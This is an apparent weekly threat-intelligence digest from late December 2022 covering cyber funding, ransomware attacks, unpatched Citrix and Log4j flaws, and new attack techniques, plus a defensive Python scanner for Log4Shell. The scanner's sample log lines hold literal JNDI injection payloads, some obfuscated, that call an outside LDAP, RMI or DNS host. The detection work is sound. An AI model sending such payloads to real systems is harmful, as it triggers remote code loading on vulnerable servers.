
Cyware Weekly Threat Intelligence, December 26-30, 2022

The Good

As we wrap up the final week of 2022, here’s a glance at a significant development from the U.S. government. President Joe Biden signed the fiscal year 2023 spending bill, which allocates $2.9 billion for cybersecurity. CISA will use the funds to strengthen civilian and federal networks and to improve its own cybersecurity operations. Meanwhile, the DoJ indicted a hacker accused of stealing $110 million in a fraud scheme against the Mango Markets cryptocurrency exchange.

  • $2.9 billion has been allocated to CISA for fiscal year 2023. With that budget, CISA aims to improve emergency communications preparedness and strengthen civilian and federal networks; a portion will also fund CISA’s advanced cybersecurity operations.
  • The DoJ filed criminal charges against a hacker accused of stealing approximately $110 million from the Mango Markets cryptocurrency exchange in a fraud scheme. The hacker manipulated prices to trap investors and drain their funds.
  • Ukrainian cyber police seized a call center that duped 18,000 victims by posing as IT security staff at banks. The scammers told victims that hackers had accessed their bank accounts and asked them to hand over their financial details.

The Bad

Moving on, ransomware attacks continued to disrupt the operations of victim organizations. This week, a Portuguese port and a city in Westchester County, New York, fell victim to the LockBit ransomware group. The Royal ransomware group claimed responsibility for an attack on the telecommunications company Intrado, and the Black Basta group was reported to have stolen data from multiple electric utilities after targeting a major U.S. government contractor.

  • The Kimsuky APT group was linked to a new phishing campaign aimed at nearly 900 foreign policy experts in South Korea. The spear-phishing emails impersonated well-known authorities and carried a link to a fake website that downloaded malware onto the victim’s machine.
  • The Port of Lisbon was hit by the LockBit ransomware group. The attackers claimed to have stolen all of the data from the port’s website and demanded close to $1.5 million to withhold the leak.
  • Thousands of Citrix servers remain vulnerable to two critical vulnerabilities, CVE-2022-27510 and CVE-2022-27518, affecting Citrix ADC and Citrix Gateway endpoints. Citrix shipped fixed builds for the two flaws in November and December respectively, so administrators should verify the running build against both advisories rather than assume one recent update covers both.
  • A year on, around 40% of software that uses Apache Log4j is still vulnerable to Log4Shell (CVE-2021-44228), even though the fix was released last year.
  • The Royal ransomware group claimed responsibility for a cyberattack on telecommunications company Intrado. As proof of the breach, the gang shared a 52.8MB archive containing scans of employee passports, driver’s licenses, and business documents.
  • Operations at the police department, municipal court, and other government offices in the city of Mount Vernon, New York, were disrupted by a LockBit ransomware attack. The intruders gained access by exploiting a remote access tool used by the city’s IT provider.
  • Threat actors used Black Basta ransomware to steal sensitive data from multiple electric utilities linked to the Chicago-based engineering firm Sargent & Lundy, which is also a major U.S. government contractor. The attack occurred in October.
  • Lake Charles Memorial Health System in Louisiana disclosed that the personal data of nearly 270,000 patients was accessed in its October ransomware attack, including health insurance information, medical records, and Social Security numbers.
  • Lazarus was linked to a large phishing campaign targeting NFT investors. Nearly 500 phishing domains mimicking well-known NFT marketplaces such as OpenSea, X2Y2, and Rarible were used to lure victims.
  • The 3Commas cryptocurrency trading platform admitted to a breach after a hacker published a set of 10,000 of its users’ exchange API keys on Twitter. The firm urged Kucoin, Coinbase, and Binance to revoke all keys connected to 3Commas.
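The Log4Shell figure above is worth pairing with a concrete detection, since the bug is still being exploited a year on. Log4j 2 (before the fix) evaluates `${...}` lookups inside any string it logs, so a payload such as `${jndi:ldap://attacker/a}` placed in an attacker-controlled field like the User-Agent header triggers a remote class load. Attackers routinely obfuscate the `jndi` keyword with nested `${lower:...}`, `${upper:...}` and default-value (`${env:NaN:-j}`, `${::-j}`) lookups, so a naive grep for `jndi:` misses them. The following scanner is an added example written for this post, not code from Cyware or any of the vendors cited; it normalizes those nested lookups the way Log4j would and then flags the resulting JNDI lookup. The access-log lines it runs over are constructed for the example, and it emulates only the lookup forms named above (other lookups such as `date` or `sys` are left as-is).

```python
import re

# Innermost ${...} lookup: a body with no further braces. Log4j resolves lookups
# from the inside out, so the normaliser does the same and repeats until stable.
INNER = re.compile(r"\$\{([^{}]*)\}")

# After normalisation the payload is a plain JNDI lookup with a scheme, e.g.
# ${jndi:ldap://...}, ${jndi:rmi://...}, ${jndi:dns://...}.
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z0-9+.-]+)\s*:", re.IGNORECASE)


def _resolve(match: re.Match) -> str:
    """Emulate the lookups attackers use to hide the word 'jndi'."""
    body = match.group(1)
    prefix, sep, rest = body.partition(":")
    prefix = prefix.lower()
    if prefix == "jndi":
        return match.group(0)          # keep the lookup we want to detect
    if sep and prefix == "lower":
        return rest.lower()            # ${lower:J} -> j
    if sep and prefix == "upper":
        return rest.upper()            # ${upper:n} -> N
    if ":-" in body:
        # Default-value syntax ${name:-default}: an undefined name (env:NaN,
        # sys:nope, or the empty ${::-x}) evaluates to the literal default.
        return body.split(":-", 1)[1]
    return match.group(0)              # other lookups are left untouched


def normalize(text: str, max_rounds: int = 10) -> str:
    """Collapse nested lookups so obfuscated payloads read as plain ${jndi:...}."""
    for _ in range(max_rounds):
        new = INNER.sub(_resolve, text)
        if new == text:
            break
        text = new
    return text


def scan_log(lines):
    """Return (line number, JNDI scheme, snippet) for every line carrying a payload."""
    hits = []
    for number, line in enumerate(lines, 1):
        norm = normalize(line)
        m = JNDI.search(norm)
        if m:
            hits.append((number, m.group(1).lower(), norm[m.start():m.start() + 60]))
    return hits


# Constructed sample access-log lines (not real traffic): a benign request, a
# plain payload in the User-Agent, a case-obfuscated payload, a default-value
# obfuscated payload in the query string, and a benign ${...} that must not fire.
SAMPLE_LOG = [
    '10.0.0.5 - - [28/Dec/2022:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.6 - - [28/Dec/2022:10:01:05 +0000] "GET /login HTTP/1.1" 200 812 "-" '
    '"${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.7 - - [28/Dec/2022:10:01:09 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${lower:j}${upper:n}di:${lower:rmi}://198.51.100.7:1099/x}"',
    '10.0.0.8 - - [28/Dec/2022:10:01:12 +0000] '
    '"GET /?q=${::-$}{${env:NaN:-j}ndi:dns://198.51.100.7/y} HTTP/1.1" 404 0 "-" "curl/7.85"',
    '10.0.0.9 - - [28/Dec/2022:10:01:15 +0000] "GET /docs/${version} HTTP/1.1" 200 100 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for number, scheme, snippet in scan_log(SAMPLE_LOG):
        print(f"line {number}: jndi/{scheme} lookup -> {snippet}")
```

Running it reports lines 2, 3 and 4 (schemes ldap, rmi and dns) and stays silent on the benign `${version}` path. Treat a hit as an exploitation attempt against whatever sits behind the logged field, not as proof of compromise; the decisive question is still whether the application's Log4j build is at a fixed version.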

New Threats

Threat actors keep evolving their attack techniques, and several new ones surfaced this week. The BlueNoroff APT adopted a new tactic to slip past Mark-of-the-Web (MotW) protections. Researchers also observed threat actors delivering a variety of malware through the Google Ads platform in the MasquerAds campaign. Furthermore, the newly identified CatB ransomware emerged with fresh evasion techniques.

  • A technique dubbed MasquerAds is increasingly being used on the Google Ads platform to spread malware to users searching for popular software. The products impersonated include Grammarly, MSI Afterburner, Slack, Dashlane, Malwarebytes, Audacity, OBS, AnyDesk, and Libre.
  • Researchers from American universities demonstrated a new eavesdropping attack, EarSpy, that recovers speech on Android phones from motion sensor data picked up as the ear speaker vibrates during a call.
  • Lazarus’ subgroup BlueNoroff has adopted a new tactic to bypass Mark-of-the-Web (MotW) protections and deliver new malware. The gang is using it to target financial institutions in Japan.
  • A security researcher identified flaws in Google Home smart speakers that could be exploited to install a backdoor and turn the device into a wiretap. The flaws could be triggered by sending crafted HTTP requests to the speaker from within the victim’s local network.
  • CISA added two four-year-old flaws in TIBCO Software’s JasperReports products to its Known Exploited Vulnerabilities catalog. The flaws, tracked as CVE-2018-5430 and CVE-2018-18809, are an information disclosure vulnerability and a directory traversal vulnerability respectively.
  • Experts warned of a critical Linux kernel vulnerability that allows remote code execution on SMB servers. The flaw has a CVSS score of 10 and affects only servers using the in-kernel ‘ksmbd’ module; hosts serving SMB through the userspace Samba daemon are not affected, so check whether ksmbd is actually loaded before treating a machine as exposed.
  • The newly identified CatB ransomware uses several anti-VM checks and DLL hijacking to evade detection. The ransomware is believed to be connected to Pandora ransomware.


Tags: log4shell attacks, dll hijacking techniques, bluenoroff apt, lockbit ransomware, citrix servers, catb ransomware group, black basta group, masquerads technique

Posted on: December 30, 2022
